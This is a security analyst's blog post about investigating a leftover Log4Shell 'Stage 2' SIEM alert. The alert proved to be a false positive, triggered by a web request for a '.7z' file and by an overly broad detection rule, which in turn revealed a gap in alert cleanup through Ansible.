Echoes of Log4Shell

Originally composed February 18, 2022

When CVE-2021–44228 (Log4Shell) began in December of 2021, the Code42 SecOps team moved quickly to respond by monitoring for the latest news, developing strategies to test our systems for vulnerabilities, and, of course, establishing alerts with the developing indicators of compromise (IoCs).

After the fervor and frenzy of December waned and we returned to something resembling a usual workday, we addressed some alert fatigue and sprawl by keeping valuable alerts and disabling the others.

We made the necessary changes to remove the disabled alerts and went about our days doing Purple Team Stuff.

Until today.

Today, an alert named “Log4j Stage 2” appeared in our queue. My first thought was, “of course.” After all, Friday before a three-day weekend is statistically proven to be the day where there is at least a 75% chance of a major security incident.

My second thought was “wait, what?”

Those of you who recall the Log4Shell exploit may remember that the “Stage 2” action of the attack (downloading the malicious class) would only be detected on internal systems if they were being used to host the malicious payload.

Attack Scenario Credit: Luciano Avendano

If this is a true positive, it may indicate that one of our hosts has been compromised and is now being used to deliver malicious Java classes to an external party…. yikes! Big yikes!

Before I pushed the big red button, however, I had to do due diligence. This was the first time this alert had ever been triggered, and it was well worth validating the findings.

One of the greatest skills I have learned in my years handling incidents is the power of taking a big, deep breath to release the sense of urgency and tension upon discovery. That deep breath gives my rational brain space to correlate and draw conclusions about the cold hard facts: the data itself.

Let’s take a look at the events that triggered the alert:

[source_ip] — — [17/Feb/2022:17:42:20 -0600] “GET http://crashplan.com/class.7z HTTP/1.1” 302 138 “-” “Mozilla/9.0 AppleWebKit/202110.05 (KHTML, like Gecko) Chrome/20.21.1005.122 Safari/211.05” “-” — -

[source_ip] — — [17/Feb/2022:17:36:28 -0600] “GET https://crashplan.com/class.7z HTTP/1.1” 302 138 “-” “Mozilla/9.0 AppleWebKit/202110.05 (KHTML, like Gecko) Chrome/20.21.1005.122 Safari/211.05” “-” — -

What stood out to me, and what may stand out to you, is the fact that this HTTP GET request is not attempting to download the expected file type (.class). Rather, it is attempting to download a file with a .7z (7zip) extension. Clearly something wasn’t well defined there.

Now, we all know that the name of the file and its type are not always in sync… for the sake of this exercise I will assume the external party was intentionally seeking to download a 7zip file.

The next thing you will notice is that the server returned an HTTP 302 (“Found”) response. I was curious where it redirected, so I followed the URL and it redirects to a 404. Oh, and by the way, the Code42 404 is delightful and you should totally check it out.

Anyway, clearly this was some errant, random web request that happened to match our alert definition. Now that I had validated what happened and ruled out system compromise, I was curious exactly why this event triggered the alert.

As soon as I saw the query definition in our SIEM, the answer was clear. The alert was configured to search for:

  • HTTP GET Requests
  • That contain the string “class” in the raw text.

And that was it! Wow those are some broad search terms. You can see that the events above were caught by the string “class” being present in the HTTP request. Perhaps this alert definition would have been more effective if it were looking for the string “.class”!

Mystery solved! Well, kind of. Remember how I mentioned that our team went through alert cleanup as we closed the book on our Log4Shell response?

Well, we had.

With my very own eyes I confirmed that this specific alert was no longer present in our server configuration, but somehow it had still generated an incident in our SOAR platform, Palo Alto XSOAR.

A bit of digging later, and it turns out we’ve got a project on our hands implementing the D part of CRUD (Create Read Update Delete) in our Ansible playbook. But that’s a blog post for another day.

Cheers, and stay safe out there!


Follow me on Medium for more (well, mostly the same in a different interface) blog content!

https://medium.com/@laura.farvour